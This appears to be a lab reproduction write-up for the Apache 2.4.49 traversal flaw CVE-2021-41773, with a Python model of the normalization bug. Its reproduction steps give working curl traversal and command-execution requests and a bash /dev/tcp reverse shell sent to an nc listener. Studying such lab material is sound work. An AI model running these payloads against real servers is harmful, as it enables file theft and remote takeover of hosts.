0x01 Vulnerability Description
A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. Earlier versions did not have the ap_normalize_path function; it was introduced in 2.4.49, and its handling of percent-encoded dot segments (such as .%2e and %2e%2e) is what makes the directory traversal possible: the segment is not recognised as ".." when dot segments are collapsed, but it becomes ".." once decoded, and the filesystem then resolves it.
Two conditions have to hold on the target. The files reached by the traversal must be served from a location that is not covered by a Require all denied directive (the default <Directory /> block denies access, so a server with the stock configuration is not exploitable this way). For command execution, mod_cgi (or mod_cgid) must be enabled so that the traversal from /cgi-bin/ can reach /bin/sh and have it executed as a CGI program.
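To make the ordering mistake concrete, the following is a simplified Python model written for this write-up; it is not Apache's ap_normalize_path code. The "vulnerable" function collapses dot segments before percent-decoding, the "fixed" one decodes first and then collapses and rejects anything that climbs above the root. The DocumentRoot and the /icons/ Alias are assumptions that mirror the lab container, and the sample request paths are the ones used in the reproduction below.

```python
"""Simplified model of the CVE-2021-41773 normalization bug (illustrative
reimplementation for this write-up, not httpd's ap_normalize_path)."""
import posixpath
from urllib.parse import unquote

# Assumptions mirroring the lab container, not values read from the target.
DOCROOT = "/usr/local/apache2/htdocs"
ALIASES = {"/icons/": "/usr/local/apache2/icons/"}


def vulnerable_normalize(path: str) -> str:
    """Flawed order: collapse literal '.' / '..' segments first, then decode
    each surviving segment. '.%2e' and '%2e%2e' are not '..' at collapse
    time, so they survive and decode to '..' afterwards."""
    out = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if out:
                out.pop()
            continue
        out.append(unquote(seg))        # '.%2e' -> '..' is kept here
    return "/" + "/".join(out)


def fixed_normalize(path: str):
    """Safe order: decode, then collapse. Returns None (httpd answers 400)
    when a '..' would climb above the root."""
    out = []
    for seg in unquote(path).split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                return None
            out.pop()
            continue
        out.append(seg)
    return "/" + "/".join(out)


def map_to_storage(normalized: str) -> str:
    """Translate a normalized URL path to the filesystem path the server
    would open (Alias lookup, then DocumentRoot). normpath plays the role
    of the OS resolving any '..' that survived normalization."""
    for prefix, target in ALIASES.items():
        if normalized.startswith(prefix):
            return posixpath.normpath(target + normalized[len(prefix):])
    return posixpath.normpath(DOCROOT + normalized)


def escapes_root(fs_path: str) -> bool:
    """True when the resolved path lies outside every served directory."""
    roots = [DOCROOT] + list(ALIASES.values())
    return not any(fs_path.startswith(r.rstrip("/") + "/") for r in roots)


if __name__ == "__main__":
    req = "/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"   # path from the write-up
    vuln = vulnerable_normalize(req)
    print("2.4.49 model :", vuln, "->", map_to_storage(vuln),
          "ESCAPES" if escapes_root(map_to_storage(vuln)) else "ok")
    print("fixed model  :", fixed_normalize(req))
```

Four encoded ".." segments are exactly what it takes to climb from /usr/local/apache2/icons/ to /, which is why the curl command in the reproduction needs no more than that from /icons/.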
0x02 Affected Versions
Apache HTTP Server 2.4.49. The fix released in 2.4.50 was incomplete; the bypass was assigned CVE-2021-42013 and affects 2.4.50 as well (the inbug-team repository listed below covers both issues).
0x03 Lab Environment
https://github.com/blasty/CVE-2021-41773
https://github.com/inbug-team/CVE-2021-41773_CVE-2021-42013
https://github.com/1nhann/CVE-2021-41773
0x04 Reproduction
1. Read a file
curl -s --path-as-is "http://10.108.0.90:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
--path-as-is is required: without it curl collapses the dot segments on the client side and the server never sees the encoded traversal. The /icons/ location has to be accessible (not covered by Require all denied) for this request to return the file.
2. Execute a command
curl -s --path-as-is -d "echo Content-Type: text/plain; echo; id" "http://10.108.0.90:8080/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh"
This reaches /bin/sh through the cgi-bin ScriptAlias, so mod_cgi (or mod_cgid) must be enabled. The POST body is handed to sh on stdin; the leading echo of a Content-Type header followed by a blank line is what makes httpd accept the output as a valid CGI response instead of returning a 500.
3. Reverse shell
Start an nc listener on the attacking host (in this lab it is 10.108.0.90, the same address as the target)
nc -lvvp 9998
Write the reverse shell command into a file on the server (raw request, sent with the same encoded path)
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 10.108.0.90:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
Connection: close

data=;echo "bash -i >& /dev/tcp/10.108.0.90/9998 0>&1">> /tmp/xxx.sh
Execute the script
POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1
Host: 10.108.0.90:12345
User-Agent: curl/7.68.0
Accept: */*
Content-Length: 53
Content-Type: application/x-www-form-urlencoded
Connection: close

echo Content-Type: text/plain; echo; bash /tmp/xxx.sh
The shell connects back to the listener.